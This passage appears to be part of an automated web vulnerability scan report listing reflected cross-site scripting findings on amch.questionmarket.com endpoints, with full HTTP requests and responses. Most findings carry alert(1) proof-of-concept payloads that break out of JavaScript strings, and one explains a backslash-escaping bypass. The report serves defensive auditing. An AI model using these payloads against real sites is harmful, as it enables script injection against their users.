/adscgen/dynamiclink.js.php |
Issue detail
The value of the auto_ctl_invite request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32c0c"-alert(1)-"2e42895c328 was submitted in the auto_ctl_invite parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=032c0c"-alert(1)-"2e42895c328&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:43:09 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b101.dl Set-Cookie: LP=1316270589; expires=Wed, 21 Sep 2011 18:43:09 GMT; path=/; domain=.questionmarket.com Content-Length: 903 Content-Type: text/html
if (!window.DL_already_ran) (function(){ var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=032c0c"-alert(1)-"2e42895c328&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg=="; try{ if (s.search('d_layer') && (window['$WLXRmAd'] || (window.parent && wind ...[SNIP]...
|
5.3. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [code parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/dynamiclink.js.php |
Issue detail
The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b55c9"-alert(1)-"21a641c0750 was submitted in the code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738b55c9"-alert(1)-"21a641c0750&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:40:49 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b203.dl Set-Cookie: LP=1316270449; expires=Wed, 21 Sep 2011 18:40:49 GMT; path=/; domain=.questionmarket.com Content-Length: 931 Content-Type: text/html
if (!window.DL_already_ran) (function(){ var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738b55c9"-alert(1)-"21a641c0750&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg=="; try{ if (s.search('d_layer') && (wi ...[SNIP]...
|
5.4. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/dynamiclink.js.php |
Issue detail
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b583"-alert(1)-"755f4a4ca6f was submitted in the lang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=2b583"-alert(1)-"755f4a4ca6f&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:42:40 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b102.dl Set-Cookie: LP=1316270560; expires=Wed, 21 Sep 2011 18:42:40 GMT; path=/; domain=.questionmarket.com Content-Length: 903 Content-Type: text/html
if (!window.DL_already_ran) (function(){ var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=2b583"-alert(1)-"755f4a4ca6f&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg=="; try{ if (s.search('d_layer') && (window['$WLXRmAd'] || (win ...[SNIP]...
|
5.5. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [loc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/dynamiclink.js.php |
Issue detail
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf150"-alert(1)-"276604bd11b was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==cf150"-alert(1)-"276604bd11b HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:44:25 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b201.dl Set-Cookie: LP=1316270665; expires=Wed, 21 Sep 2011 18:44:25 GMT; path=/; domain=.questionmarket.com Content-Length: 903 Content-Type: text/html
if (!window.DL_already_ran) (function(){ var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==cf150"-alert(1)-"276604bd11b"; try{ if (s.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) { s=s.replace('d_layer','h_layer'); d=document; h=true; } else { d=top.document; } } ...[SNIP]...
|
5.6. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/dynamiclink.js.php |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2908"-alert(1)-"6e1ffc1ebb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==&f2908"-alert(1)-"6e1ffc1ebb0=1 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:47:02 GMT Server: Apache Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: a211 Set-Cookie: LP=1316270822; expires=Wed, 21-Sep-2011 18:47:02 GMT; path=/; domain=.questionmarket.com Content-Length: 906 Content-Type: text/html
if (!window.DL_already_ran) (function(){ var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==&f2908"-alert(1)-"6e1ffc1ebb0=1"; try{ if (s.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) { s=s.replace('d_layer','h_layer'); d=document; h=true; } else { d=top.document; }
...[SNIP]...
|
5.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [noiframe parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/dynamiclink.js.php |
Issue detail
The value of the noiframe request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad1b5"-alert(1)-"ced91aa03e8 was submitted in the noiframe parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1ad1b5"-alert(1)-"ced91aa03e8&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:43:47 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b102.dl Set-Cookie: LP=1316270627; expires=Wed, 21 Sep 2011 18:43:47 GMT; path=/; domain=.questionmarket.com Content-Length: 903 Content-Type: text/html
if (!window.DL_already_ran) (function(){ var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1ad1b5"-alert(1)-"ced91aa03e8&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg=="; try{ if (s.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent[' ...[SNIP]...
|
5.8. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [p parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/dynamiclink.js.php |
Issue detail
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fede"-alert(1)-"2ee520ed36a was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=11fede"-alert(1)-"2ee520ed36a&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:41:27 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b201.dl Set-Cookie: LP=1316270487; expires=Wed, 21 Sep 2011 18:41:27 GMT; path=/; domain=.questionmarket.com Content-Length: 903 Content-Type: text/html
if (!window.DL_already_ran) (function(){ var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=11fede"-alert(1)-"2ee520ed36a&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg=="; try{ if (s.search('d_layer') && (window ...[SNIP]...
|
5.9. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [protocol parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/dynamiclink.js.php |
Issue detail
The value of the protocol request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 602cc"%3balert(1)//13596a6aef9 was submitted in the protocol parameter. This input was echoed as 602cc";alert(1)//13596a6aef9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http602cc"%3balert(1)//13596a6aef9&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:42:03 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b202.dl Set-Cookie: LP=1316270523; expires=Wed, 21 Sep 2011 18:42:03 GMT; path=/; domain=.questionmarket.com Content-Length: 933 Content-Type: text/html
if (!window.DL_already_ran) (function(){ var d,e,h=false,s="http602cc";alert(1)//13596a6aef9://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http602cc"%3balert(1)//13596a6aef9&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDo ...[SNIP]...
|
5.10. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/dynamiclink.js.php |
Issue detail
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 369be"-alert(1)-"d94f7c831e7 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10369be"-alert(1)-"d94f7c831e7&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:40:09 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b201.dl Set-Cookie: LP=1316270409; expires=Wed, 21 Sep 2011 18:40:09 GMT; path=/; domain=.questionmarket.com Content-Length: 906 Content-Type: text/html
if (!window.DL_already_ran) (function(){ var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10369be"-alert(1)-"d94f7c831e7&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg=="; try{ if (s.search('d_la ...[SNIP]...
|
5.11. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/surv_lastpage_disq.php |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33fea\'%3balert(1)//008a4b6b504 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33fea\\';alert(1)//008a4b6b504 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /adscgen/surv_lastpage_disq.php?p1=Click+to+Close&p2=Continue+to+your+destina/33fea\'%3balert(1)//008a4b6b504tion HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt= Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_
|
Response
